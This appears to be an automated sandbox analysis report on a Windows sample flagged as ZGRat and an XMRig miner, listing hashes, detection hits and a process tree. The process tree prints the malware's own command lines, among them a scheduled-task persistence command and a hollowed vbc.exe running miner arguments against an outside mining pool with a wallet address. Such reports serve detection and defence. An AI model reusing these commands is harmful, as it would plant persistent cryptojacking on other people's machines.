Analysis
-
max time kernel
148s -
max time network
132s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system -
submitted
25/02/2024, 12:17
Behavioral task
behavioral1
Sample
tmp.exe
Resource
win7-20240221-en
General
-
Target
tmp.exe
-
Size
5.0MB
-
MD5
a3fb2b623f4490ae1979fea68cfe36d6
-
SHA1
34bec167e0f95ecc36761f77c93c1229c2c5d1f4
-
SHA256
3bc9c1d7f87f71c9e98fac63c2f10d2651f51848082a85d6b3550649e4289d56
-
SHA512
370b23364bcf8f07aa951c1c6a9d6b03b516db8fd7444d25087ad8071c54bb06fd50ce311a205e0770211167728d86516e934a39a606f0bf0c9fbdd13dca7912
-
SSDEEP
98304:xrd0tlZ+I89l7cGcGI4G/Mul2rq/aReDkizMeQUz4:x+tlQ4zGk/Mul2rVe4iwVU
Malware Config
Signatures
-
Detect ZGRat V1 4 IoCs
resource yara_rule behavioral1/memory/1632-0-0x0000000000110000-0x0000000000614000-memory.dmp family_zgrat_v1 behavioral1/files/0x000a0000000122b8-15.dat family_zgrat_v1 behavioral1/memory/3020-19-0x0000000000DE0000-0x00000000012E4000-memory.dmp family_zgrat_v1 behavioral1/files/0x000a0000000122b8-47.dat family_zgrat_v1 -
XMRig Miner payload 8 IoCs
resource yara_rule behavioral1/memory/2180-32-0x0000000140000000-0x00000001407DC000-memory.dmp xmrig behavioral1/memory/2180-34-0x0000000140000000-0x00000001407DC000-memory.dmp xmrig behavioral1/memory/2180-35-0x0000000140000000-0x00000001407DC000-memory.dmp xmrig behavioral1/memory/2180-37-0x0000000140000000-0x00000001407DC000-memory.dmp xmrig behavioral1/memory/2180-36-0x0000000140000000-0x00000001407DC000-memory.dmp xmrig behavioral1/memory/2180-38-0x0000000140000000-0x00000001407DC000-memory.dmp xmrig behavioral1/memory/2180-39-0x0000000140000000-0x00000001407DC000-memory.dmp xmrig behavioral1/memory/2180-43-0x0000000140000000-0x00000001407DC000-memory.dmp xmrig -
Executes dropped EXE 1 IoCs
pid Process 3020 .exe -
Loads dropped DLL 2 IoCs
pid Process 1680 cmd.exe 1680 cmd.exe -
resource yara_rule behavioral1/memory/2180-23-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral1/memory/2180-24-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral1/memory/2180-27-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral1/memory/2180-28-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral1/memory/2180-30-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral1/memory/2180-32-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral1/memory/2180-34-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral1/memory/2180-35-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral1/memory/2180-37-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral1/memory/2180-36-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral1/memory/2180-38-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral1/memory/2180-39-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral1/memory/2180-43-0x0000000140000000-0x00000001407DC000-memory.dmp upx -
Uses the VBS compiler for execution 1 TTPs
-
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 3020 set thread context of 2180 3020 .exe 36 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2556 schtasks.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 2996 timeout.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 3020 .exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 1632 tmp.exe Token: SeDebugPrivilege 3020 .exe Token: SeLockMemoryPrivilege 2180 vbc.exe Token: SeLockMemoryPrivilege 2180 vbc.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 2180 vbc.exe -
Suspicious use of WriteProcessMemory 22 IoCs
description pid Process procid_target PID 1632 wrote to memory of 1680 1632 tmp.exe 28 PID 1632 wrote to memory of 1680 1632 tmp.exe 28 PID 1632 wrote to memory of 1680 1632 tmp.exe 28 PID 1680 wrote to memory of 2996 1680 cmd.exe 30 PID 1680 wrote to memory of 2996 1680 cmd.exe 30 PID 1680 wrote to memory of 2996 1680 cmd.exe 30 PID 1680 wrote to memory of 3020 1680 cmd.exe 31 PID 1680 wrote to memory of 3020 1680 cmd.exe 31 PID 1680 wrote to memory of 3020 1680 cmd.exe 31 PID 3020 wrote to memory of 2624 3020 .exe 32 PID 3020 wrote to memory of 2624 3020 .exe 32 PID 3020 wrote to memory of 2624 3020 .exe 32 PID 2624 wrote to memory of 2556 2624 cmd.exe 34 PID 2624 wrote to memory of 2556 2624 cmd.exe 34 PID 2624 wrote to memory of 2556 2624 cmd.exe 34 PID 3020 wrote to memory of 2180 3020 .exe 36 PID 3020 wrote to memory of 2180 3020 .exe 36 PID 3020 wrote to memory of 2180 3020 .exe 36 PID 3020 wrote to memory of 2180 3020 .exe 36 PID 3020 wrote to memory of 2180 3020 .exe 36 PID 3020 wrote to memory of 2180 3020 .exe 36 PID 3020 wrote to memory of 2180 3020 .exe 36 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\tmp.exe"C:\Users\Admin\AppData\Local\Temp\tmp.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1632 -
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\tmp1DEC.tmp.bat""2⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1680 -
C:\Windows\system32\timeout.exetimeout 33⤵
- Delays execution with timeout.exe
PID:2996
-
-
C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3020 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn "ERGVRDVMSK" /tr "C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"4⤵
- Suspicious use of WriteProcessMemory
PID:2624 -
C:\Windows\system32\schtasks.exeschtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn "ERGVRDVMSK" /tr "C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"5⤵
- Creates scheduled task(s)
PID:2556
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -o fr-zephyr.miningocean.org:5342 -u ZEPHYR2dNRNd7BpuKZoXnqZu7WiTzoMXE8EhzsTJDnXV9ZDksih16M2EazfmCb3ax9Z78hH9iJMxSQE1NBkPCK6W3M8SBGcc7ZC2z -p work -a rx/0 --donate-level 1 --opencl4⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:2180
-
-
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {5438764F-EE42-4117-AC69-329AEAA01316} S-1-5-21-1298544033-3225604241-2703760938-1000:IZKCKOTP\Admin:Interactive:[1]1⤵PID:640
-
C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exeC:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe2⤵PID:1160
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3.3MB
MD58e312940aa7e62ae8a56bb16613d1d07
SHA173bf7f0b16127dfdc17d1c4874d1b65a88713b54
SHA2563588ef38f810c654be12daace323bd44096347ac092ea2448c2d1f204c8d1e65
SHA5129fb4b4541ffb7a1da0c2361b240b60eb5c77ad41629b392137361c83c59980d9eeb7b63808de4c7590ae5bcbc76e76862065009d82ce4ad556110d60ac4b3183
-
Filesize
168B
MD517f9019d5e0e548c6433b4440383b5e3
SHA152790dcb6638f34613cd28a555e8a4f960ff0f3c
SHA256f3c39897f68e63b77da5f7db84da0204de490a606c97f8cc3d0151545cda451f
SHA512fa39e4cdb3f7a882237d2a491aca0fbb0efc1890a4f050ea2890aa997d0afcd5e3bf2e0079127974472dba75eb1d5e7828b6ffa0da8fd93b4d2870597679dc59
-
Filesize
5.0MB
MD5a3fb2b623f4490ae1979fea68cfe36d6
SHA134bec167e0f95ecc36761f77c93c1229c2c5d1f4
SHA2563bc9c1d7f87f71c9e98fac63c2f10d2651f51848082a85d6b3550649e4289d56
SHA512370b23364bcf8f07aa951c1c6a9d6b03b516db8fd7444d25087ad8071c54bb06fd50ce311a205e0770211167728d86516e934a39a606f0bf0c9fbdd13dca7912